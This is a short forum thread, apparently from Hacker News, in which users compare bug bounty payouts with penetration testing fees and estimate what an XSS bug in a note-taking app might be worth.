[justsomeuser]

I do not have the market rates for vulnerabilities, but I do know some pen testing companies charge $10,000 for a few days of work that may not return any concrete bugs.

Compared with hiring a pen testing team, offering high bounties seems like a bargain as you get actual exploits that would impact the company.

[tptacek]

Yes, that is the premise behind bug bounties. If you're a vulnerability researcher with a track record, you will probably make better money and certainly more consistent money as a pentester. Many pentesters just do both.

I have, uh, some experience with the rates here.

[KajMagnus]

Can I ask, if you were the owner of the popular note taking app, what bounty would you want to have paid for that vulnerability? I.e.:

"XSS bug in a popular note taking app ... attacker to download all the users notes just by having them visit a URL"

So as to not feel worried that future vulnerabilities would get sold on the black market instead

[tptacek]

XSS? Outside of a social network, where it can propagate itself? For a non-FAANG-scale company? Probably between $250 and $500, if it's a clean and effective XSS. Less if you have to interact with an obscure feature of the application.

[KajMagnus]

Thanks for the reply, I would have guessed maybe 10 x more.

Interesting to hear,

Makes me think that there is not any big marked for exploits targeting smaller companies. Maybe such exploits (for smaller products) would be useful primarily for spear phishing? and not bring in so much money if sold, & hard to find a buyer?

Still, if the note taking app was sth well known like Ev*rnote, I wish they'd pay more. (No idea if it was.)